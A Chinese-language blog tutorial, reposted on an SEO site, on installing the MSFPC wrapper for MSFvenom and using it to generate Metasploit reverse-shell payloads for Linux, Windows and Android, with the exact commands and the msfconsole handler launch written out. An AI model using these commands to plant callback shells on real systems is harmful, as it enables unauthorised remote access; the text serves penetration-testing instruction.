• SEO文章推广! 合作联系qq:122325244 正式全面改版 !免费SEO地址:https://www.seozhan.cn/tool 站长QQ群
  • 如果您觉得本站非常有看点,那么赶紧使用Ctrl+D 收藏SEO站长博客吧

如何使用MSFPC简化生成Payload的过程

脚本编程 SEO站长博客 4个月前 (08-01) 38次浏览 已收录 0个评论

摘要

一般来说,生成payload的默认工具是 MSFvenom,这是一个独立于 Metasploit 的payload生成器及编码器。虽然它是一个非常强大的payload生成神器,但是对于一些新手来说,可能难以在短时间内熟悉其操作。即使在进行最初的了解之后,生成一个基本的payload也需要输入相当多的内容,而今天,我们将看到使用 MSFPC 更便捷地生成paylaod。

MSFPC,或者说是 MSFvenom Payload生成器,其实是一个基于 MSFvenom 的 Payload生成器,但是它旨在简化基本的有效载荷创建过程,用户使用 MSFPC 可以尽可能简单地创建 Payload,有时甚至只需要一个参数!如果你以前使用过 MSFvenom,那么可能已经自行编写了一个简单的 shell 脚本来自动化频繁地生成Payload。即使这样,这个工具也绝对值得一试。

   第一步:安装 MSFPC

首先,我们需要先行安装 MSFPC,步骤会因为操作系统的差别而有所不同。

   第一种:在 Kali Linux 上安装

如果你想要在 Kali Linux 上安装 MSFPC,那么可能会十分简单,因为它已经包含在了 Kali 工具库中。如果没有,那么就使用 apt 安装,如下所示:

   apt install msfpc 第二种:在一般的 Linux 上安装

对于没有这个软件包的 Linux 和 Unix 版本,只需要在终端从 github 进行克隆就好了:

git clone

cd mpc

一旦成功克隆,就可以将其复制到一个目录中了,对于脚本本身,可以选择/usr/bin。

我个人不喜欢搞乱/usr/bin,把他们放在自己的目录中方便时刻跟踪我编译的或者是从 github 上获取的工具,当然了,这些都取决于你自己。

   为所有用户安装

为了可以放在/usr/bin 中,先切换到你的 mpc 目录,然后使用终端改变脚本权限,如下所示:

cd /path/to/mpc //mpc 的目录

sudo chown root:root msfpc.sh

sudo chmod 755 msfpc.sh

sudo cp msfpc.sh /usr/bin

这组命令意思是将脚本的所有者和组都更改为 root,然后使用 chmod 命令将文件权限配置为 755,最后,将脚本移动到/usr/bin 中。

   为特定用户安装

要安装到主目录中的 pentest 文件夹,你需要打开你的终端并输入以下内容开始该过程:

mkdir ~/pentest

cd /path/to/mpc

chmod 700 msfpc.sh

cp msfpc.sh ~/pentest

你可能已经有一个 pentest 目录。如果是这样的话,就没有必要再创建一个新的。 chmod 命令将脚本的权限更改为 RWX ——。然后我们将它复制到 pentest 目录中。

这还没完,因为这个目录不是我们路径的一部分,为了解决这个问题,我们需要编辑我们主目录中的.bashrc。我一直在用 Vim,当然你可以使用任何喜欢的编辑器(leafpad),你需要键入以下内容:

   vim ~/.bashrc

一旦你开始编辑了,使用以下命令将 pentest 目录添加到路径变量中:

   PATH=$PATH:/path/to/my/pentest/directory

你可以省略最后的斜杠。

保存后,使用 source 和 which 命令:

source ~/.bashrc

which msfpc.sh

这样一来,MSFPC 就完成安装了!

   生成一个 Linux Payload

现在我们已经在自己选择的系统上安装了该工具,接下来就开始生成Payload。对于我们的第一个 Payload,我们将使用 msfpc.sh 生成一个基本的 Linux 反向 TCP ELF Payload。

对于第一个 Payload,我们只需要将一个参数传给 MSFPC。

   msfpc.sh linux

首先需要注意的是,我只告诉了 MSFPC 我想生成一个 Linux Payload,没有任何其他的信息,所以 MSFPC 不知道我们想连接的地址,所以它提供了选项。WAN 是我的外部 IP,lo 是本地的,ens33 是我的网络接口。

我选择了 2(ens33),如果你记不住你的地址,那么这种方式就可以节省你很多时间。CMD 那里显示的输出是生成该 Payload 而执行的完整 MSFvenom 命令,相当详细,而且你也可以进行核对。

一旦生成了 Payload,就可以设置一个 Metasploit handler 来测试一下了,但是我也不必手动配置这个 handler,因为 Msfpc.sh 会创建一个名字类似于 Payload 的文件,拓展名为 rc。为了启动这个 handler,我只需要将文件放到 Metasploit 中。

   sudo msfconsole -q -r /home/barrow/linux-shell-staged-reverse-tcp-443-elf.rc

此命令中 sudo 的原因是因为我只是试图绑定到端口 443 的普通用户。-q 参数告诉 msfconsole 跳过启动画面,-r 告诉 msfconsole 加载文件。完成后,一旦执行有效载荷,就会回连给我一个反向 shell。

   生成一个 Windwos Payload

对于 Windows,我想创建多种不同的 Payload。Msfpc.sh 允许批量创建 Payload,这意味着我可以为特定目标创建所有 Payload,以下是命令:

   msfpc.sh windows batch ens33

在这个命令中,我告诉 msfpc.sh 使用我的 IP 创建所有 Payload,在生成过程中,可能会出现一些错误,但是最终还是会有一批 Windows Payload 文件。

   生成安卓 Payload

我们已经完成了 Windows 和 Linux 部分。接下来使用 msfpc.sh 为 Android 设备生成一个 Payload。对于这个例子,我将生成一个 Android 反向 TCP HTTPS MeterpreterPayload。可以用下面的命令:

   msfpc.sh apk HTTPS ens33

该命令将为 Android 创建一个反向 TCP 有效载荷,并使用我 IP 地址通过 HTTPS 进行通信。

   总结

当谈到快速创建基本的 Payload 时,Msfpc.sh 是真的不错。这个脚本的主要缺点是它只能用于生成基本的 Payload。而无法生成任何经过编码的,可绕过防病毒的 Payload,但这取决于你的目标。很多时候,你只需要快速创建一个 Payload,把它放在某个地方,然后每天给它“打电话”。在这种情况下,msfpc.sh 真的很棒。

在整篇文章中,我主要介绍了涉及了 msfpc.sh 的各种选项。但还有很多其他选项可用,你可以使用–help verbose,这样一来,脚本会为你提供完整的帮助文件。帮助文件非常之详细,且易于阅读。 weinxin


SEO站长博客 , 版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明原文链接:如何使用MSFPC简化生成Payload的过程
喜欢 (0)
[h4ck3st@126.com]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址